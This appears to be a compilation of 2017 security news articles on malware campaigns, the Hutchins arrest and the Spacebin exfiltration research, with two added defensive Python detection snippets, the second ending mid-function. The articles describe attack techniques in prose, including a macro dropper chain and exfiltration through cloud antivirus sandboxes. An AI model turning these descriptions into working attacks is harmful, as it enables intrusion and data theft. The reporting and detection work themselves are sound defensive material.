AlphaBay, the largest dark web market, had been run out of Thailand, and filled a gap left behind by the notorious Silk Road online market, shut down by authorities in 2013.

Officials at the time said shutting down the two markets and the arrests of administrators enabled them to collect extensive intelligence on buyers and sellers, including criminal gangs. Their names were being distributed to law enforcement in 37 countries.

- From hero to accused -

Lawyers at the San Francisco-based online rights group Electronic Frontier Foundation said they were looking to contact Hutchins.

"The EFF is deeply concerned about the arrest of Marcus Hutchins, a security researcher known for shutting down the WannaCry ransomware. We are looking into the matter, and are reaching out to Hutchins," a statement from the group said.

A spokesperson for the British Embassy in Washington said only that they "are in touch with local authorities in Las Vegas following reports of a British man being arrested."

Hutchins was hailed as a hero in May for finding and triggering a "kill switch" for a WannaCry ransomware attack that was spreading wildly around the world, locking away data on computers and demanding money for its release.

Andrew Mabbitt, another security researcher who was with Hutchins in Las Vegas, said he did not believe the allegations. "He spent his career stopping malware, not writing it," Mabbitt said on Twitter.

WannaCry Hero Marcus Hutchins was detained in Las Vegas after Def Con conference
4.8.2017 securityaffairs

Marcus Hutchins, the expert who discovered the “kill switch” that halted the outbreak of the WannaCry ransomware was detained in Las Vegas after Def Con.
Marcus Hutchins, also known as MalwareTech, is the 22-year-old security expert who made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. Marcus Hutchins has been arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.


In the last 24 hours there were no tweets from the expert’s account, and the news of the arrest was confirmed to Motherboard by a friend of the expert.

“Motherboard verified that a detainee called Marcus Hutchins, 23, was being held at the Henderson Detention Center in Nevada early on Thursday. A few hours after, Hutchins was moved to another facility, according to a close personal friend.” reported Motherboard. “The friend told Motherboard they “tried to visit him as soon as the detention centre opened but he had already been transferred out.” Motherboard granted the source anonymity due to privacy concerns.”
“I’ve spoken to the US Marshals again and they say they have no record of Marcus being in the system. At this point we’ve been trying to get in contact with Marcus for 18 hours and nobody knows where he’s been taken,” the person added. “We still don’t know why Marcus has been arrested and now we have no idea where in the US he’s been taken to and we’re extremely concerned for his welfare.”

At the time of writing there was no precise information about the arrest and its motivation.

Hutchins discovered that by registering the domain

it was possible to stop the propagation of the malware.

Hutchins’s friend Andrew Mabbitt confirmed via Twitter that the expert was detained at the FBI’s field office in Las Vegas.

Andrew Mabbitt @MabbsSec
Finally located @MalwareTechBlog, he's in the Las Vegas FBI field office. Can anyone provide legal representation?
7:48 PM - Aug 3, 2017
The UK’s National Crime Agency confirmed to The Register that a UK national was arrested in Nevada, but did not provide further information about the charges.

Today another event made the headlines: the hackers behind WannaCry cashed out over $140,000 from the Bitcoin wallets used for the payments.

It is normal that many experts speculate the two events are correlated.

Stay Tuned!

Updated on August 3rd, 2017
“On Wednesday, 22-year-old Marcus Hutchins — who runs a security blog called MalwareTech — was arrested in Las Vegas for “his role in creating and distributing the Kronos banking Trojan,” according to a spokesperson from the U.S. Department of Justice.” states the CNN.

“The charges relate to alleged conduct occurring between July 2014 and July 2015.

According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. The Eastern District of Wisconsin returned a six-count indictment against Hutchins on July 12, 2017. It was unsealed at the time of his arrest.”


UK malware researcher Marcus Hutchins accused of creating Kronos Trojan
4.8.2017 securityaffairs

The British security researcher Marcus Hutchins was arrested by the FBI on Thursday after being indicted on charges of creating the Kronos banking malware.
The news of Marcus Hutchins‘s arrest made the headlines, and the reason for it has shocked the IT sector: the British malware expert who stopped the WannaCry ransomware outbreak was arrested in Las Vegas on Wednesday on suspicion of being a malware author.

The 22-year-old security expert, also known as MalwareTech, was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

FBI agents nabbed the man at the airport while he was preparing to fly back to the UK. He was arrested for “his role in creating and distributing the Kronos banking Trojan,” according to a spokesperson from the U.S. Department of Justice.

According to the investigators, Marcus Hutchins created the malware and shared it online, below the indictment issued by Eastern District of Wisconsin.

The prosecutors believe Hutchins created, shared, and masterminded the Kronos banking Trojan between July 2014 and July 2015.

Marcus Hutchins indictment

Marcus Hutchins developed the malicious code and updated it in February 2015 together with a co-conspirator, who is accused of advertising the Kronos banking Trojan on hacker forums.
The accomplice sold at least one copy of the malware for $2,000; the US government also claims that on June 11, 2015, Hutchins sold attack code in America.

Kronos was developed starting from the Zeus Trojan and took its name from the father of Zeus in Greek mythology; its purpose is to steal money from victims’ bank accounts.

The principal features advertised were:

Common credential-stealing techniques such as form grabbing and HTML injection compatible with the major browsers (Internet Explorer, Firefox and Chrome);
32- and 64-bit ring3 (user-mode) rootkit capable of also “defending from other Trojans”;
Antivirus bypassing;
Malware-to-C&C communication encryption;
Sandbox bypassing.
Kronos malware was offered for $7,000 and it includes numerous modules for evading detection and analysis, the seller also offered a “try and buy” server for $1,000, giving the possibility to test the malware for a week prior to buying it.

Going back in time, experts noticed that Marcus Hutchins tweeted the following message on July 13, 2014.

MalwareTech ✔@MalwareTechBlog
Anyone got a kronos sample?
7:26 PM - Jul 13, 2014
The experts also speculate that Hutchins was identified after the Feds shut down the darkweb marketplace AlphaBay, where Kronos was available for sale. It is likely that the Feds identified him during the investigation into the marketplace.

New TrickBot banking Trojan variant borrows spreading capabilities from Wannacry
3.8.2017 securityaffairs

A cyber gang is improving its version of the TrickBot banking Trojan by implementing the self-spreading worm-like capabilities used by WannaCry and NotPetya
Cybercriminals are capitalizing on the lessons of the recent massive WannaCry and NotPetya ransomware attacks.

At least one cyber gang is improving its version of the TrickBot banking Trojan by implementing the self-spreading worm-like capabilities that allowed both ransomware families to spread rapidly worldwide.

The new version of the TrickBot banking Trojan, dubbed “1000029” (v24), includes the code for the exploitation of the Windows Server Message Block (SMB) vulnerability.


Recently malware experts at Flashpoint have discovered that the TrickBot Banking Trojan has been improved to spread locally across networks by exploiting the Server Message Block (SMB) flaw.

“On July 27, 2017, in coordination with Luciano Martins, Director of Cyber Risk Services at Deloitte, Flashpoint observed a new version – “1000029” – of the formidable “Trickbot” banking Trojan with a new “worm64Dll” module, spread via the email spam vector, impersonating invoices from a large international financial institution.” states the analysis shared by Flashpoint.

The experts noticed that TrickBot ‘1000029’ is still in a development phase; for example, the crooks have not yet implemented a feature to mass-scan the Internet for vulnerable systems.

The Trojan currently scans domains for lists of vulnerable servers via the NetServerEnum Windows API and enumerates other computers on the network via the Lightweight Directory Access Protocol (LDAP).

“The Trickbot gang appears to be testing a worm-like malware propagation module, which appears to spread locally via Server Message Block (SMB), scan domains for lists of servers via NetServerEnum Windows API, and enumerate other computers via Lightweight Directory Access Protocol (LDAP) enumeration. As of this writing, this malware feature does not appear to be fully implemented by the criminal gang as the initial purported SMB exploit has not yet been observed.” continues the analysis.

The researchers also discovered that the new TrickBot variant can be disguised as ‘setup.exe’, delivered through a PowerShell script, to spread through interprocess communication and download additional versions of TrickBot onto shared drives.

Experts have no doubt that the TrickBot crew will continue to improve the threat.

“Flashpoint assesses with moderate confidence that the Trickbot gang will likely continue to be a formidable force in the near term,” concludes Flashpoint.
“Even though the worm module appears to be rather crude in its present state, it’s evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and ‘NotPetya’ and is attempting to replicate their methodology.”

The Bateleur backdoor is the new weapon in the Carbanak gang’s arsenal
3.8.2017 securityaffairs

Experts at Proofpoint noticed the infamous cyber crime gang Carbanak has added a new JScript backdoor dubbed Bateleur Backdoor to its arsenal.
According to researchers at security firm Proofpoint, the infamous cyber crime gang Carbanak has added a new JScript backdoor dubbed Bateleur Backdoor to its arsenal. Carbanak, aka FIN7, has also used updated macros.

The Carbanak gang was first discovered by Kaspersky Lab in 2015; the group has stolen at least $300 million from 100 financial institutions.

In early 2016, the Carbanak gang targeted banks and financial institutions, mainly in the US and the Middle East.

In November last year, experts at Trustwave uncovered a new campaign launched by the group targeting organizations in the hospitality sector.

In January, the Carbanak gang started using Google services for command and control (C&C) communication.

The crooks used the “ggldr” script to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

The hackers created a unique Google Sheets spreadsheet for each infected user, in an attempt to avoid detection.

In May, researchers at Trustwave observed the group using new social engineering techniques and phishing techniques, including the use of hidden shortcut files (LNK files) for target compromise.

Back to the present, the group started using new macros and the Bateleur backdoor in attacks against United States-based chain restaurants.

“Proofpoint researchers have uncovered that the threat actor commonly referred to as FIN7 has added a new JScript backdoor called Bateleur and updated macros to its toolkit. We have observed these new tools being used to target U.S.-based chain restaurants, although FIN7 has previously targeted hospitality organizations, retailers, merchant services, suppliers and others. The new macros and Bateleur backdoor use sophisticated anti-analysis and sandbox evasion techniques as they attempt to cloak their activities and expand their victim pool,” reads the analysis published by Proofpoint.

The Carbanak gang started using macro documents to drop the new JScript backdoor instead of the GGLDR script, which was used in past campaigns to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

Experts noticed that the Carbanak gang has updated multiple times both the macro and the malware since June.

Attackers used simple and effective messages to target a restaurant chain. If the email is sent from an Outlook.com account, the text claims “This document is encrypted by Outlook Protect Service”; if it is sent from a Gmail account, the lure document instead claims “This document is encrypted by Google Documents Protect Service.”


The documents embed macros that access the malicious payload via a caption: they extract the JScript from the caption and save the content to debug.txt in the current user’s temporary folder (%TMP%). Next, the macro creates a scheduled task to execute debug.txt as a JScript (the Bateleur backdoor), then sleeps for 10 seconds before deleting the scheduled task.

The Bateleur backdoor appears very sophisticated; it implements anti-sandbox and anti-analysis (obfuscation) mechanisms.

“The malicious JScript has robust capabilities that include anti-sandbox functionality, anti-analysis (obfuscation), retrieval of infected system information, listing of running processes, execution of custom commands and PowerShell scripts, loading of EXEs and DLLs, taking screenshots, uninstalling and updating itself, and possibly the ability to exfiltrate passwords, although the latter requires an additional module from the command and control server (C&C).” continues the analysis.

“Although Bateleur has a much smaller footprint than GGLDR/HALFBAKED, lacks basic features such as encoding in the C&C protocol, and does not have backup C&C servers, we expect the Bateleur developer(s) may add those features in the near future,” the security researchers say.

Proofpoint speculates the Bateleur backdoor is being used by the FIN7/Carbanak group: the researchers observed a threat actor using this specific code along with GGLDR scripts, which were used exclusively by the gang.

The phishing messages were “sharing very similar or identical attachment names, subject lines, and/or sender addresses.”

The Bateleur backdoor was also leveraging the Tinymet Meterpreter downloader, a tool employed by Carbanak hackers since 2016.

“A small Meterpreter downloader script, called Tinymet by the actor(s) (possibly inspired by [5]), has repeatedly been observed being utilized by this group at least as far back as 2016 [6] as a Stage 2 payload. In at least one instance, we observed Bateleur downloading the same Tinymet Meterpreter downloader,” states Proofpoint.

The Carbanak gang is still active and continuously improves its Tactics, Techniques, and Procedures.

“We continue to see regular changes to the tactics and tools used by FIN7 in their attempt to infect more targets and evade detection. The Bateleur JScript backdoor and new macro-laden documents appear to be the latest in the group’s expanding toolset, providing new means of infection, additional ways of hiding their activity, and growing capabilities for stealing information and executing commands directly on victim machines,” ProofPoint concludes.

Carbanak Hackers Using Bateleur Backdoor

2.8.2017 securityweek  Virus
The financially-motivated Carbanak hacker group has added a new JScript backdoor to its cyber-weapons arsenal, along with updated macros, Proofpoint security researchers warn.

Also referred to as FIN7, the multinational gang of cybercriminals has been active for at least two years and has been associated with a variety of incidents this year. In 2015, Kaspersky Lab first outed the group, saying that it had hit more than 100 banks across 30 countries and made off with up to one billion dollars over a period of roughly two years.

In early May, the group was said to have started using shims for process injection and persistence, only one week after adopting new phishing techniques, including the use of hidden shortcut files (LNK files) for target compromise.

Recently, the group started using new macros and a commodity backdoor called Bateleur in attacks against United States-based chain restaurants, Proofpoint reveals. Previously, the group had been targeting hospitality organizations, retailers, merchant services, suppliers and others.

The security researchers also note that both the new macros and the backdoor use sophisticated anti-analysis and sandbox evasion techniques. The group started using macro documents to drop the previously undocumented JScript backdoor in June, marking a switch from their customary GGLDR payload. Both the macro and the malware have seen multiple updates since June.

Depending on the type of account the spam email is sent from (i.e. Outlook, Gmail), the attachment document packs a matching lure by claiming that the document is encrypted by the mail service’s Protect Service. The macro-enabled document grabs the malicious payload from a caption, saves the content to debug.txt, then creates a scheduled task to execute debug.txt as a JScript. The macro sleeps for 10 seconds, then deletes the scheduled task.
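A defender-side check for the scheduled-task step described here and in the Proofpoint write-up earlier on this page: an added example, not Proofpoint's code, that parses the TaskContent XML Windows records in Security event 4698 ("A scheduled task was created") and flags tasks that launch a .txt file from the temp folder through the JScript engine. The sample task XML is constructed, and the assumption that the task uses wscript.exe with the //E:JScript engine override is mine, not something the articles state.

```python
"""Flag scheduled tasks that run a .txt file from %TMP% as JScript.

Added detection example (not Proofpoint's code).  The task XML below is
constructed to mimic the TaskContent field of Security event 4698; the
wscript.exe + //E:JScript launch is an assumed way to run a .txt as JScript.
"""
import re
import xml.etree.ElementTree as ET

# Real Task Scheduler schema namespace used in 4698 TaskContent.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed: a task matching the debug.txt-as-JScript pattern.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\wscript.exe</Command>
      <Arguments>//E:JScript //B C:\\Users\\alice\\AppData\\Local\\Temp\\debug.txt</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: an ordinary task that should not be flagged.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Program Files\\Backup\\backup.exe</Command>
      <Arguments>--nightly</Arguments>
    </Exec>
  </Actions>
</Task>"""

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
ENGINE_OVERRIDE_RE = re.compile(r"//E:\s*JScript", re.IGNORECASE)
NON_SCRIPT_EXT_RE = re.compile(r"\.(txt|log|dat|tmp)\b", re.IGNORECASE)


def exec_actions(task_xml):
    """Yield (command, arguments) for every <Exec> action in the task XML."""
    root = ET.fromstring(task_xml)
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        yield cmd, args


def score_task(task_xml):
    """Return the list of reasons a task matches the pattern (empty if none)."""
    reasons = []
    for cmd, args in exec_actions(task_xml):
        host = cmd.lower().rsplit("\\", 1)[-1]
        if host not in SCRIPT_HOSTS:
            continue  # only script hosts can run a .txt as JScript
        if ENGINE_OVERRIDE_RE.search(args):
            reasons.append("script host forced to the JScript engine (//E:JScript)")
        if TEMP_DIR_RE.search(args):
            reasons.append("script path is in a temp directory")
        if NON_SCRIPT_EXT_RE.search(args):
            reasons.append("script file has a non-script extension")
    return reasons


def is_suspicious(task_xml, min_reasons=2):
    """Alert when at least min_reasons indicators are present together."""
    return len(score_task(task_xml)) >= min_reasons
```

The same parser can be pointed at real 4698 events by feeding it the TaskContent field; the task is deleted ten seconds later, so the creation event is the durable artifact to hunt on.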

The malicious JScript – which is the Bateleur backdoor – has anti-sandbox and anti-analysis (obfuscation) functionality.

The malware can also retrieve a PowerShell command containing a payload capable of retrieving user account credentials, meaning that it could also potentially target user’s passwords with the help of an additional module, Proofpoint says.

Proofpoint has observed the malware jump from version 1.0 to over the course of a single month and reveals that several commands were added with the update, including the ability to execute a fetched EXE or PowerShell commands via WMI.

“Although Bateleur has a much smaller footprint than GGLDR/HALFBAKED, lacks basic features such as encoding in the C&C protocol, and does not have backup C&C servers, we expect the Bateleur developer(s) may add those features in the near future,” the security researchers say.

Proofpoint claims it has determined with a high degree of certainty that Bateleur is being used by the FIN7/Carbanak group, and also provides some evidence to sustain the claim.

In June, similar messages separately dropped GGLDR and Bateleur to the same target, and the timing and similarity suggest the same actor was behind all of them, especially with some messages “sharing very similar or identical attachment names, subject lines, and/or sender addresses.”

Bateleur was also observed downloading the Tinymet Meterpreter downloader, a tool employed by Carbanak hackers since at least as far back as 2016. A new command tinymet recently added to the FIN7-linked GGLDR/HALFBAKED backdoor was also observed downloading a JScript version of the Tinymet Meterpreter downloader.

“We continue to see regular changes to the tactics and tools used by FIN7 in their attempt to infect more targets and evade detection. The Bateleur JScript backdoor and new macro-laden documents appear to be the latest in the group’s expanding toolset, providing new means of infection, additional ways of hiding their activity, and growing capabilities for stealing information and executing commands directly on victim machines,” the security researchers conclude.

Dangerous Mobile Banking Trojan Gets 'Keylogger' to Steal Everything
1.8.2017 thehackernews
Cyber criminals are becoming more adept, innovative, and stealthy with each passing day. They have now shifted from traditional to more clandestine techniques that come with limitless attack vectors and are harder to detect.
Security researchers have discovered that one of the most dangerous Android banking Trojan families has now been modified to add a keylogger to its recent strain, giving attackers yet another way to steal victims’ sensitive data.
Kaspersky Lab's Senior malware analyst Roman Unuchek spotted a new variant of the well-known Android banking Trojan, dubbed Svpeng, in the middle of last month with a new keylogger feature, which takes advantage of Android's Accessibility Services.
Trojan Exploits 'Accessibility Services' to Add Keylogger
Yes, the keylogger added in the new version of Svpeng takes advantage of Accessibility Services — an Android feature that provides users alternative ways to interact with their smartphone devices.
This change makes the Svpeng Trojan able not only to steal entered text from other apps installed on the device and log all keystrokes, but also to grant itself more permissions and rights to prevent victims from uninstalling the Trojan.
In November last year, the Svpeng banking trojan infected over 318,000 Android devices across the world over the span of only two months with the help of Google AdSense advertisements that were abused to spread the malicious banking Trojan.
Over a month ago, researchers also discovered another attack taking advantage of Android's Accessibility Services, called Cloak and Dagger attack, which allows hackers to silently take full control of the infected devices and steal private data.
If You Are Russian, You Are Safe!
Although the new variant of the Svpeng malware is not yet widely deployed, the malware has already hit users in 23 countries over the course of a week, which include Russia, Germany, Turkey, Poland, and France.
But what's worth noticing is that, even though most infected users are from Russia, the new variant of Svpeng Trojan doesn't perform malicious actions on those devices.
According to Unuchek, after infecting the device, the Trojan first checks the device's language. If the language is Russian, the malware performs no further malicious tasks—this suggests the criminal group behind this malware is Russian and avoids violating Russian laws by hacking locals.
How 'Svpeng' Trojan Steals Your Money
Unuchek says the latest version of Svpeng he spotted in July was being distributed through malicious websites that disguised as a fake Flash Player.
Once installed, as I have mentioned above, the malware first checks for the device language and, if the language is not Russian, asks the device to use Accessibility Services, which opens the infected device to a number of dangerous attacks.
With access to Accessibility Services, the Trojan grants itself device administrator rights, displays an overlay on top of legitimate apps, installs itself as the default SMS app, and grants itself some dynamic permissions, such as the ability to make calls, send and receive SMS, and read contacts.
Additionally, using its newly-gained administrative capabilities, the Trojan can block every attempt of victims to remove device administrator rights—thereby preventing the uninstallation of the malware.
Using accessibility services, Svpeng gains access to the inner workings of other apps on the device, allowing the Trojan to steal text entered in other apps, take screenshots every time the victim presses a button on the keyboard, and collect other available data.
"Some apps, mainly banking ones, do not allow screenshots to be taken when they are on top. In such cases, the Trojan has another option to steal data – it draws its phishing window over the attacked app," Unuchek says.
"It is interesting that, in order to find out which app is on top, it uses accessibility services too."
All the stolen information is then uploaded to the attackers' command and control (C&C) server. As part of his research, Unuchek said he managed to intercept an encrypted configuration file from the malware's C&C server.
Decrypting the file helped him find out some of the websites and apps that Svpeng targets, as well as help him obtain a URL with phishing pages for both the PayPal and eBay mobile apps, along with links for banking apps from the United Kingdom, Germany, Turkey, Australia, France, Poland, and Singapore.
Besides URLs, the file also allows the malware to receive various commands from the C&C server, which includes sending SMS, collecting information such as contacts, installed apps and call logs, opening the malicious link, gathering all SMS from the device, and stealing incoming SMS.
The Evolution of 'Svpeng' Android Banking Malware
Researchers at Kaspersky Lab initially discovered the Svpeng Android banking malware trojan back in 2013, with phishing as its primary capability.
Back in 2014, the malware was modified to add a ransomware component that locked the victim's device (posing as the FBI and claiming the user had visited sites containing pornography) and demanded $500 from users.
The malware was among the first to begin attacking SMS banking, use phishing web pages to overlay other apps in an effort to steal banking credentials and to block devices and demand money.
In 2016, cyber criminals were actively distributing Svpeng via Google AdSense using a vulnerability in the Chrome web browser, and now abusing Accessibility Services, which possibly makes Svpeng the most dangerous mobile banking malware family to date that can steal almost anything—from your Facebook credentials to your credit cards and bank accounts.
How to Protect Your Smartphone From Hackers
With just Accessibility Services, this banking Trojan gains all necessary permissions and rights to steal lots of data from the infected devices.
The malicious techniques of the Svpeng malware even work on fully-updated Android devices with the latest Android version and all security updates installed, so there is little users can do in order to protect themselves.
There are standard protection measures you need to follow to remain unaffected:
Always stick to trusted sources, like Google Play Store and the Apple App Store, but only from trusted and verified developers.
Most importantly, verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Do not download apps from third party sources, as most often such malware spreads via untrusted third-parties.
Avoid unknown and unsecured Wi-Fi hotspots and keep your Wi-Fi turned OFF when not in use.
Never click on links provided in an SMS, MMS or email. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Install a good antivirus app that can detect and block such malware before it can infect your device, and always keep the app up-to-date.

Malware Attack Disrupts Merck's Worldwide Operations

1.8.2017 securityweek  Virus
American pharmaceutical giant Merck revealed in its financial results announcement for the second quarter of 2017 that a recent cyberattack has disrupted its worldwide operations, including manufacturing, research and sales.

While Merck has not provided details about the incident in its financial report, the June 27 attack referenced by the company is most likely the NotPetya malware outbreak that affected tens of thousands of systems in more than 65 countries. Many of the victims were located in Ukraine, the home of a tax software firm whose product was used as the main attack vector.

Researchers initially believed NotPetya (aka PetrWrap, exPetr, GoldenEye and Diskcoder.C) was a piece of ransomware, similar to WannaCry. However, a closer analysis revealed that it was actually a wiper and it was unlikely that victims could recover their files, even if they paid the ransom.

Merck, which was named as one of the victims of the NotPetya attack shortly after the outbreak started, said on Friday that it had yet to fully assess the impact of the disruption. The company said it had still been working on restoring operations and minimizing the effects of the incident.

“The company is in the process of restoring its manufacturing operations. To date, Merck has largely restored its packaging operations and has partially restored its formulation operations,” Merck said. “The company is in the process of restoring its Active Pharmaceutical Ingredient operations but is not yet producing bulk product. The company’s external manufacturing was not impacted. Throughout this time, Merck has continued to fulfill orders and ship product.”

Merck is just one of several major companies affected by the NotPetya attack. The list also includes Ukraine's central bank, Russian oil giant Rosneft, UK-based advertising group WPP, Danish shipping giant A.P. Moller-Maersk, and FedEx-owned TNT Express.

FedEx reported last month that it had still been working on restoring systems hit by the destructive malware attack, and admitted that it may not be able to fully restore all affected systems and recover all the critical business data encrypted by NotPetya.

Reckitt Benckiser, the British consumer goods company that makes Nurofen, Dettol and Durex products, said the attack disrupted its ability to manufacture and distribute products. The firm estimated that the incident could have an impact of £100 million ($130 million) on its revenue.

Someone Hijacks A Popular Chrome Extension to Push Malware
31.7.2017 thehackernews

Phishers have recently hacked an extension for Google Chrome after compromising the Chrome Web Store account of German developer team a9t9 software, and abused it to distribute spam messages to unsuspecting users.
Dubbed Copyfish, the extension allows users to extract text from images, PDF documents and video, and has more than 37,500 users.
Unfortunately, the Chrome extension of Copyfish has been hijacked and compromised by some unknown attacker, who equipped the extension with advertisement injection capabilities. However, its Firefox counterpart was not affected by the attack.
The attackers even moved the extension to their own developer account, preventing its developers from removing the infected extension from the store, even after it was noticed that the extension had been compromised.
"So far, the update looks like standard adware hack, but, as we still have no control over Copyfish, the thieves might update the extension another time… until we get it back," the developers warned. "We can not even disable it—as it is no longer in our developer account."
Here's How the Hackers Hijacked the Extension:

Copyfish developers traced the hack back to a phishing attack that occurred on 28 July.
According to a9t9 software, one of its team members received a phishing email impersonating the Chrome Web Store team that told them to update their Copyfish Chrome extension; otherwise, Google would remove it from the web store.
The phishing email instructed the member to click on "Click here to read more details," which opened the "Google" password dialogue box.
The provided link was a bit.ly link, but since the team member was viewing the link in HTML form, he did not find it immediately suspicious and entered the password for their developer account.
The developers said the password screen looked almost exactly the one used by Google. Although the team did not have any screenshot of the fake password page as it appeared only once, it did take a screenshot of the initial phishing email and its reply.
"This looked legit to the team member, so we did not notice the [phishing] attack as such at this point. [Phishing] for Chrome extensions was simply not on our radar screen," the developers said.
Once the developer entered the credentials for a9t9 software’s developer account, the hackers behind the attack updated the Copyfish extension on 29 July to Version 2.8.5, which pushes out spam and advertisements to its users.
The worst part is that the Copyfish makers noticed the issue very quickly but could not do anything, because the hackers had moved the extension to their own developer account.
The software company contacted Google developer support, which is currently working to provide the company access to their software.
a9t9 software is warning users that the Chrome extension for Copyfish is currently not under its control. Users are advised not to install the malicious Chrome extension and to remove it if they have already installed it.

PoC Malware Exploits Cloud Anti-Virus for Data Exfiltration

31.7.2017 securityweek  Virus
Security researchers at SafeBreach have created proof-of-concept (PoC) malware that can exfiltrate data from endpoints that don’t have a direct Internet connection by exploiting cloud-enhanced anti-virus (AV) agents.

Although highly secure enterprises might employ strict egress filtering, meaning that endpoints either have no direct Internet connection or have a connection restricted to hosts required by their legitimately installed software, data can be exfiltrated if cloud AV products are in use, the security researchers argue.

Presented at BlackHat USA 2017 by Itzik Kotler and Amit Klein from SafeBreach Labs, the PoC tool relies on packing data inside an executable the main malware process creates on the compromised endpoint. Thus, if the AV product employs an Internet-connected sandbox as part of its cloud service, data is exfiltrated as soon as the AV agent uploads the newly created executable to the cloud for further inspection, where the file is executed in an Internet-connected sandbox.

In a whitepaper (PDF), the researchers not only provide data and insights on AV in-the-cloud sandboxes, but they also cover the use of on-premise sandboxes, cloud-based/online scanning and malware categorization services, and sample sharing. Furthermore, they provide information on how the attack can be further enhanced and how cloud-based AV vendors can mitigate it.

Dubbed Spacebin, the proof-of-concept tool was made available on GitHub. The project includes directories with both server-side and client-side code. Instructions on how to use the tool are available on the project’s page.

What Kotler and Klein focused on was the analysis of two network architectures found in highly secure organizations: one where endpoints don’t have access to the Internet, but an AV management server does; and another where the machines have access to a closed set of hosts, meaning there’s very limited access to the Internet. In both scenarios, cloud-based AV agents are deployed across all endpoints.

“We are going to abuse the cloud AV sandboxing feature that many AV vendors use. The rationale for this feature is that it enables the AV vendor to offer lightweight agent software, and carry out the heavy-lifting security analysis work in the cloud. Specifically, in such an architecture, the AV agent needs to conduct only basic security checks against other processes and files, allowing for a grey area where a binary “malicious/non-malicious” decision cannot be determined locally. A process/file falling into this grey area is sent to the cloud for further analysis, and a security decision is obtained from the cloud (sometimes in near real time),” the researchers explain.

The sample is typically executed in an AV cloud sandbox and its behavior observed there, where a malicious program can run with no harm to real users or resources, the researchers note. They also argue that the AV cloud sandbox would normally be connected to the Internet, as this would provide better detection capabilities (for example, the malware might attempt to connect to a command and control server and the sandbox would detect that).

“The attacker process (called Rocket) contains a secondary executable (called Satellite) as part of its data. The Satellite can be encrypted/compressed to hide the fact that it is another executable, thus the Satellite can be no more than a piece of data in the Rocket memory space (and file) that does not jeopardize the Rocket. The Satellite contains a placeholder for arbitrary data (“payload”) to be exfiltrated. The location of the placeholder should be known to the Rocket,” the researchers explain.

As part of the attack, the Rocket collects the data (payload) it needs to exfiltrate, decrypts / decompresses the Satellite and embeds the payload in its image (can further compress or encrypt the payload), writes the Satellite image to disk as a file, and spawns the Satellite (from its file) as a child process.

The Satellite then performs an intentionally suspicious action to trigger endpoint AV detection and have the Satellite image file (which contains the payload) sent to the AV cloud. Next, the cloud AV executes the Satellite file in an Internet-connected sandbox and the Satellite process can attempt to exfiltrate the embedded payload using any known Internet-based exfiltration methods.

“Note that this attack is ‘noisy’ in the sense that the AV product will flag the Satellite file as suspicious and as such this may have visible impact on the user, as well as visibility in logs and records. However, for a one time exfiltration attack this will already be too late, as the payload will already be traveling to the cloud by the time this incident is investigated by flesh-and-blood analysts,” the security researchers explain.

One mitigation solution would involve blocking the AV sandboxes (both on-premise and cloud sandboxes) from accessing the Internet. This, however, may be too strict in many cases, as it would no longer allow them to observe the Internet traffic of a sample. Because of that, Internet blocking could be applied only for samples not coming from the Internet, because they do not carry enterprise endpoint-specific payloads and can’t exfiltrate anything useful from the endpoint.

“We can generalize our findings and state that sharing an executable (suspicious/malicious sample) from the organization, with the outside world in some manner (e.g. submitting the sample to a cloud analysis service or allowing such file submission) can result in data exfiltration, unless there is confidence that the sample has arrived from outside the organization and the file has not changed since its arrival,” the researchers conclude.
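One way to implement the rule in that conclusion on the sandbox side, as an added example that is not SafeBreach's or any AV vendor's code: Internet-connected detonation is granted only to samples whose exact bytes were recorded entering the organization from outside, and everything an endpoint created or modified (which may carry endpoint data, as in the Rocket/Satellite scheme) is detonated in an isolated sandbox. The ingress ledger format and the sample bytes are assumed and constructed for the example.

```python
"""Choose Internet-connected or isolated detonation by sample provenance.

Added example (not SafeBreach's or a vendor's code).  Assumes the perimeter
(web proxy, mail gateway) writes a ledger line with the SHA-256 of every
file that enters; the ledger format and sample bytes are constructed.
"""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed samples: one that came in through the web proxy, and one
# built locally in the style of a "Satellite" carrying embedded data.
EXTERNAL_SAMPLE = b"MZ\x90\x00 constructed installer fetched from the internet"
LOCAL_SAMPLE = b"MZ\x90\x00 constructed satellite with embedded payload"

# Constructed ingress ledger: "<sha256> <source> <description>" per line.
INGRESS_LEDGER_TEXT = (
    f"{sha256(EXTERNAL_SAMPLE)} proxy https://files.example.invalid/installer.exe\n"
    f"{'0' * 64} mailgw attachment:unrelated.docm\n"
    "garbage line that a parser must tolerate\n"
)


def parse_ledger(text: str) -> dict:
    """Map SHA-256 -> (source, description); malformed lines are skipped."""
    ledger = {}
    for line in text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3 or len(parts[0]) != 64:
            continue
        digest, source, desc = parts
        ledger[digest.lower()] = (source, desc)
    return ledger


def sandbox_policy(sample: bytes, ledger: dict) -> dict:
    """Decide how one agent-submitted sample may be detonated.

    'internet' only when the exact bytes were seen entering from outside;
    a file with no ingress record either originated on an endpoint or was
    changed there, so it gets no network path out of the sandbox.
    """
    digest = sha256(sample)
    hit = ledger.get(digest)
    if hit is None:
        return {
            "network": "isolated",
            "reason": "no ingress record: file originated or changed inside the network",
            "sha256": digest,
        }
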